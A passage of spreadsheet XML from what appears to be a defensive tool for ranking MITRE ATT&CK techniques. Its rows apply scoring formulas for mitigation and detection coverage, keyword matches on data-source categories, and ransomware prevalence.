        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z539">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA539">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB539">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC539" s="29" t="s">
        <v>1893</v>
      </c>
      <c r="AD539" s="25" t="str" cm="1">
        <f t="array" ref="AD539">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC539)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE539" s="25">
        <f>IF(AD539="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF539" s="25" t="str" cm="1">
        <f t="array" ref="AF539">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC539)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG539" s="25">
        <f>IF(AF539="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH539" s="25" t="str" cm="1">
        <f t="array" ref="AH539">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC539)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI539" s="25">
        <f>IF(AH539="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ539" s="25" t="str" cm="1">
        <f t="array" ref="AJ539">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC539)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK539" s="25">
        <f>IF(AJ539="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL539" s="25" t="str" cm="1">
        <f t="array" ref="AL539">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC539)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM539" s="25">
        <f>IF(AL539="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN539" s="64">
        <v>0</v>
      </c>
      <c r="AO539" s="51"/>
      <c r="AP539" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.6500000000000005E-3</v>
      </c>
      <c r="AQ539" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.2166666666666668E-2</v>
      </c>
      <c r="AR539" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.2166666666666668E-2</v>
      </c>
      <c r="AS539" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT539" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU53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40" spans="1:47">
      <c r="A540" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="B540" s="25">
        <f>SUM(H540,M540,V540)*(1+SUM(AE540,AG540,AI540,AK540,AM540))</f>
        <v>5.6600000000000011E-2</v>
      </c>
      <c r="C540" s="25" t="s">
        <v>1894</v>
      </c>
      <c r="D540" s="25" t="s">
        <v>1714</v>
      </c>
      <c r="E540" s="25" t="s">
        <v>1895</v>
      </c>
      <c r="F540" s="51">
        <v>0</v>
      </c>
      <c r="G540" s="51">
        <v>1</v>
      </c>
      <c r="H540" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I540">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J540">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K540">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L540">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M540" s="25">
        <v>0</v>
      </c>
      <c r="N540" s="51">
        <v>0</v>
      </c>
      <c r="O540" s="51">
        <v>0</v>
      </c>
      <c r="P540" s="51">
        <v>0</v>
      </c>
      <c r="Q540" s="51">
        <v>0</v>
      </c>
      <c r="R540" s="51"/>
      <c r="S540" s="51">
        <v>0</v>
      </c>
      <c r="T540" s="51"/>
      <c r="U540" s="51">
        <v>0</v>
      </c>
      <c r="V540" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W540">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X540">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y540">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z540">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA540">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB540">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC540" s="29" t="s">
        <v>1067</v>
      </c>
      <c r="AD540" s="25" t="str" cm="1">
        <f t="array" ref="AD540">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC540)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE540" s="25">
        <f>IF(AD540="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF540" s="25" t="str" cm="1">
        <f t="array" ref="AF540">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC540)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG540" s="25">
        <f>IF(AF540="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH540" s="25" t="str" cm="1">
        <f t="array" ref="AH540">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC540)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI540" s="25">
        <f>IF(AH540="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ540" s="25" t="str" cm="1">
        <f t="array" ref="AJ540">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC540)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK540" s="25">
        <f>IF(AJ540="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL540" s="25" t="str" cm="1">
        <f t="array" ref="AL540">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC540)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM540" s="25">
        <f>IF(AL540="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN540" s="52">
        <v>0</v>
      </c>
      <c r="AO540" s="51">
        <v>0</v>
      </c>
      <c r="AP540" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="AQ540" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AR540" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AS540" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT540" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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41" spans="1:47">
      <c r="A541" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="B541" s="25">
        <f>SUM(H541,M541,V541)*(1+SUM(AE541,AG541,AI541,AK541,AM541))</f>
        <v>5.6600000000000011E-2</v>
      </c>
      <c r="C541" s="25" t="s">
        <v>1896</v>
      </c>
      <c r="D541" s="25" t="s">
        <v>1867</v>
      </c>
      <c r="E541" s="25" t="s">
        <v>1873</v>
      </c>
      <c r="F541" s="51">
        <v>0</v>
      </c>
      <c r="G541" s="51">
        <v>1</v>
      </c>
      <c r="H541" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I541">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J541">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K541">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L541">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M541" s="25">
        <v>0</v>
      </c>
      <c r="N541" s="51">
        <v>0</v>
      </c>
      <c r="O541" s="51">
        <v>0</v>
      </c>
      <c r="P541" s="51">
        <v>0</v>
      </c>
      <c r="Q541" s="51">
        <v>0</v>
      </c>
      <c r="R541" s="51"/>
      <c r="S541" s="51">
        <v>0</v>
      </c>
      <c r="T541" s="51"/>
      <c r="U541" s="51">
        <v>0</v>
      </c>
      <c r="V541" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W541">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X541">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y541">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z541">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA541">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB541">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC541" s="29" t="s">
        <v>1469</v>
      </c>
      <c r="AD541" s="25" t="str" cm="1">
        <f t="array" ref="AD541">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC541)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE541" s="25">
        <f>IF(AD541="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF541" s="25" t="str" cm="1">
        <f t="array" ref="AF541">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC541)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG541" s="25">
        <f>IF(AF541="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH541" s="25" t="str" cm="1">
        <f t="array" ref="AH541">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC541)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI541" s="25">
        <f>IF(AH541="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ541" s="25" t="str" cm="1">
        <f t="array" ref="AJ541">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC541)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK541" s="25">
        <f>IF(AJ541="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL541" s="25" t="str" cm="1">
        <f t="array" ref="AL541">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC541)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM541" s="25">
        <f>IF(AL541="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN541" s="60">
        <v>0</v>
      </c>
      <c r="AO541" s="51">
        <v>0</v>
      </c>
      <c r="AP541" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="AQ541" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AR541" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AS541" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT541" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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42" spans="1:47">
      <c r="A542" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="B542" s="25">
        <f>SUM(H542,M542,V542)*(1+SUM(AE542,AG542,AI542,AK542,AM542))</f>
        <v>5.6600000000000011E-2</v>
      </c>
      <c r="C542" s="25" t="s">
        <v>1897</v>
      </c>
      <c r="D542" s="25" t="s">
        <v>1867</v>
      </c>
      <c r="E542" s="25" t="s">
        <v>1898</v>
      </c>
      <c r="F542" s="51">
        <v>0</v>
      </c>
      <c r="G542" s="51">
        <v>1</v>
      </c>
      <c r="H542" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I542">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J542">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K542">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L542">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M542" s="25">
        <v>0</v>
      </c>
      <c r="N542" s="51">
        <v>0</v>
      </c>
      <c r="O542" s="51">
        <v>0</v>
      </c>
      <c r="P542" s="51">
        <v>0</v>
      </c>
      <c r="Q542" s="51">
        <v>0</v>
      </c>
      <c r="R542" s="51"/>
      <c r="S542" s="51">
        <v>0</v>
      </c>
      <c r="T542" s="51"/>
      <c r="U542" s="51">
        <v>0</v>
      </c>
      <c r="V542" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W542">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X542">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y542">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z542">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA542">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB542">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC542" s="29" t="s">
        <v>1469</v>
      </c>
      <c r="AD542" s="25" t="str" cm="1">
        <f t="array" ref="AD542">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC542)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE542" s="25">
        <f>IF(AD542="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF542" s="25" t="str" cm="1">
        <f t="array" ref="AF542">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC542)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG542" s="25">
        <f>IF(AF542="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH542" s="25" t="str" cm="1">
        <f t="array" ref="AH542">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC542)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI542" s="25">
        <f>IF(AH542="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ542" s="25" t="str" cm="1">
        <f t="array" ref="AJ542">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC542)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK542" s="25">
        <f>IF(AJ542="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL542" s="25" t="str" cm="1">
        <f t="array" ref="AL542">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC542)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM542" s="25">
        <f>IF(AL542="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN542" s="52">
        <v>0</v>
      </c>
      <c r="AO542" s="51">
        <v>0</v>
      </c>
      <c r="AP542" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="AQ542" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AR542" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AS542" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT542" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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43" spans="1:47">
      <c r="A543" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="B543" s="25">
        <f>SUM(H543,M543,V543)*(1+SUM(AE543,AG543,AI543,AK543,AM543))</f>
        <v>5.6600000000000011E-2</v>
      </c>
      <c r="C543" s="25" t="s">
        <v>1899</v>
      </c>
      <c r="D543" s="25" t="s">
        <v>1900</v>
      </c>
      <c r="E543" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F543" s="51">
        <v>0</v>
      </c>
      <c r="G543" s="51">
        <v>1</v>
      </c>
      <c r="H543" s="35">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I543">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J543">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K543">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L543">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M543" s="25">
        <v>0</v>
      </c>
      <c r="N543" s="51">
        <v>0</v>
      </c>
      <c r="O543" s="51">
        <v>0</v>
      </c>
      <c r="P543" s="51">
        <v>0</v>
      </c>
      <c r="Q543" s="51">
        <v>0</v>
      </c>
      <c r="R543" s="51"/>
      <c r="S543" s="51">
        <v>0</v>
      </c>
      <c r="T543" s="51"/>
      <c r="U543" s="51">
        <v>0</v>
      </c>
      <c r="V543" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W543">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X543">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y543">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z543">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA543">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB543">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC543" s="29" t="s">
        <v>1469</v>
      </c>
      <c r="AD543" s="25" t="str" cm="1">
        <f t="array" ref="AD543">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC543)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE543" s="25">
        <f>IF(AD543="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF543" s="25" t="str" cm="1">
        <f t="array" ref="AF543">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC543)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG543" s="25">
        <f>IF(AF543="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH543" s="25" t="str" cm="1">
        <f t="array" ref="AH543">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC543)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI543" s="25">
        <f>IF(AH543="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ543" s="25" t="str" cm="1">
        <f t="array" ref="AJ543">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC543)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK543" s="25">
        <f>IF(AJ543="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL543" s="25" t="str" cm="1">
        <f t="array" ref="AL543">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC543)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM543" s="25">
